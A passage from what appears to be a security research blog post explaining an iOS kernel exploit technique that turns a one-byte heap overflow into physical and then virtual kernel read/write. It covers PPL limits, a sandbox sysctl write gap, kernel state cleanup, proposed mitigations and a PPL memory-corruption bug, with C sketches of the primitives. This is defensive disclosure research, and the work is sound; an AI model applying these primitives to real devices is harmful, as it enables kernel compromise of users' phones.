Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

The AMCC has MMIO registers that store the physical addresses of the bounds of the KTRR lockdown region.


Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)
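In code, this step is essentially one more use of the mapping primitive. The sketch below assumes a hypothetical map_physical_page() helper built on the technique from Part I; the register address is the A13 value quoted above, and decoding the raw register value into a full physical base address (units, shift, DRAM base) is SoC-specific and elided.

#include <stdint.h>

/* Hypothetical helper built on the physical mapping primitive from Part I:
 * maps the 16K physical page containing `paddr` into userspace and returns a
 * user pointer to the start of that page. */
extern volatile uint8_t *map_physical_page(uint64_t paddr);

static uint32_t
read_amcc_rorgnbaseaddr(void)
{
    const uint64_t amcc_rorgnbaseaddr = 0x200000680;   /* A13 value from the post */

    volatile uint8_t *page = map_physical_page(amcc_rorgnbaseaddr & ~0x3fffULL);
    volatile uint32_t *reg =
        (volatile uint32_t *)(page + (amcc_rorgnbaseaddr & 0x3fff));

    /* The raw value encodes the start of the KTRR lockdown region, which
     * begins with the kernelcache; converting it to a physical address is
     * device-specific. */
    return *reg;
}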

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then reads that address.

An example sysctl_oid struct in the kernelcache.
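To make the read half concrete, here is a minimal userspace sketch. It assumes the map_physical_page() helper from Part I, a sandbox-readable sysctl whose handler simply copies out the variable at oid_arg1 (many integer sysctls work this way), and an illustrative struct offset; the real offset and the chosen sysctl depend on the kernel build.

#include <sys/sysctl.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper from Part I: maps the 16K physical page containing
 * `paddr` into userspace and returns a pointer to the start of the page. */
extern volatile uint8_t *map_physical_page(uint64_t paddr);

#define OID_ARG1_OFFSET 0x28   /* illustrative; depends on the kernel build */

/* Read 4 bytes of kernel memory: map the physical page holding the target
 * sysctl_oid (located via the known kernelcache physical base), retarget its
 * oid_arg1 backing-variable pointer, then invoke the sysctl as an ordinary
 * sandbox-allowed read. */
static uint32_t
kread32_via_sysctl(uint64_t oid_paddr, const char *sysctl_name, uint64_t kaddr)
{
    volatile uint8_t *page = map_physical_page(oid_paddr & ~0x3fffULL);
    volatile uint64_t *arg1 =
        (volatile uint64_t *)(page + (oid_paddr & 0x3fff) + OID_ARG1_OFFSET);
    *arg1 = kaddr;

    uint32_t value = 0;
    size_t size = sizeof(value);
    sysctlbyname(sysctl_name, &value, &size, NULL, 0);
    return value;
}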


Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.
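For reference, this is essentially how the Libc wrapper drives { 0, 3 }: every lookup passes the string name as the "new" value, which is why the node is expected to be writable. A sketch of the standard pattern:

#include <sys/sysctl.h>
#include <stdint.h>
#include <string.h>

/* Sysctl node { 0, 3 } ("sysctl.name2mib") takes a sysctl name string as its
 * new value and returns the corresponding numeric MIB as its old value. */
static int
name_to_mib(const char *name, int *mib, size_t *mib_len)
{
    int query[2] = { 0, 3 };
    size_t size = *mib_len * sizeof(int);
    int err = sysctl(query, 2, mib, &size, (void *)(uintptr_t)name, strlen(name));
    *mib_len = size / sizeof(int);
    return err;
}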

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

Looking back to the vm_map_copyout_internal() function, we are currently spinning in an infinite loop on the "done" entry, having just finished mapping a page.


There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's vme_next to point to &copy->c_u.hdr.links, and then update the "done" entry's vme_next to point to the overlay entry.

To break out of the loop, we will have to link the "done" entry to an "overlay" entry that links back to the corrupted vm_map_copy.


The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.
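Concretely, with the virtual read/write primitive in hand, the fixup is a simple scan-and-replace over the spinning thread's kernel stack. This sketch uses hypothetical kread64/kwrite64 helpers; locating the stack bounds from the thread structure is elided.

#include <stdint.h>

/* Hypothetical helpers built on the sysctl-based virtual read/write. */
extern uint64_t kread64(uint64_t kaddr);
extern void     kwrite64(uint64_t kaddr, uint64_t value);

/* Walk the spinning vm_map_copyout_internal() thread's kernel stack and swap
 * every spilled pointer to the corrupted vm_map_copy with a legitimate
 * vm_map_copy allocated from vm_map_copy_zone, so the zfree() at the end of
 * the function frees an object from the expected zone. */
static void
patch_spilled_copy_pointers(uint64_t stack_bottom, uint64_t stack_top,
                            uint64_t corrupted_copy, uint64_t replacement_copy)
{
    for (uint64_t addr = stack_bottom; addr < stack_top; addr += sizeof(uint64_t)) {
        if (kread64(addr) == corrupted_copy) {
            kwrite64(addr, replacement_copy);
        }
    }
}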

Replacing the corrupted vm_map_copy with a valid vm_map_copy that can be safely freed simply requires changing pointers on the kernel stack to point to the replacement copy instead.


At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

A slide from an Azimuth presentation introducing the use of vm_map_copy_t in iOS kernel heap overflow attacks.


At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.
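
To make the idea concrete, here is a minimal sketch of what such a policy check could look like. This is not actual XNU/PPL code: every identifier below is hypothetical, and a real implementation would live inside the PPL mapping routines themselves.

/* Hypothetical sketch of a stricter PPL mapping policy; not actual XNU code. */
#include <stdbool.h>
#include <stdint.h>

extern uint64_t kernelcache_base_pa, kernelcache_end_pa;  /* assumed globals        */
extern uint64_t dram_base_pa, dram_end_pa;                /* AP DRAM boundaries     */

static bool
ppl_physaddr_allowed_for_user(uint64_t pa, bool has_io_entitlement)
{
    /* There is no legitimate use case for mapping kernelcache pages into
     * userspace, so treat them as locked down (in the spirit of PVH_FLAG_LOCKDOWN). */
    if (pa >= kernelcache_base_pa && pa < kernelcache_end_pa)
        return false;
    /* Physical I/O addresses outside the Application Processor's DRAM (such as
     * the AMCC registers mentioned earlier) are only mappable with an explicit
     * entitlement, serving as the escape hatch for exceptional cases. */
    if (pa < dram_base_pa || pa >= dram_end_pa)
        return has_io_entitlement;
    return true;
}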

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.
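
As a rough sketch of that addition (not actual XNU source; this assumes the iOS 13-era zone_require(address, expected_zone) interface and the vm_map_copy_zone symbol), the check in vm_map_copyout_internal() might look like this:

    if (copy->type == VM_MAP_COPY_ENTRY_LIST) {
        /* A genuine entry-list copy is allocated from vm_map_copy_zone, while
         * KERNEL_BUFFER copies come from kalloc; a KERNEL_BUFFER object whose
         * type byte was corrupted by a small overflow would fail this check. */
        zone_require(copy, vm_map_copy_zone);
        /* ... existing entry-list copyout path ... */
    }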

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and I expect there are other as-yet unpublished techniques that are equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.

The core of Apple is PPL: Breaking the XNU kernel's kernel

Posted by Brandon Azad, Project Zero

While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.

PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.

I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.

However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.

Decompiler output showing a call to pmap_remove_range_options().
Some memory corruption in pmap_remove_options_internal(). Using a kernel function calling primitive, both va_start and size are controlled.

The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.

MARK_AS_PMAP_TEXT static int
pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)

The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.

static int
pmap_remove_range_options(
        pmap_t pmap,
        pt_entry_t *bpte,   // The first L3 TTE to remove
        pt_entry_t *epte,   // The end of the TTEs
        uint32_t *rmv_cnt,
        int options)

Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:

remove_count = pmap_remove_range_options(
                   pmap,
                   &l3_table[(va_start >> 14) & 0x7FF],
                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]
                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),
                   &rmv_spte,
                   options);

This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.
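
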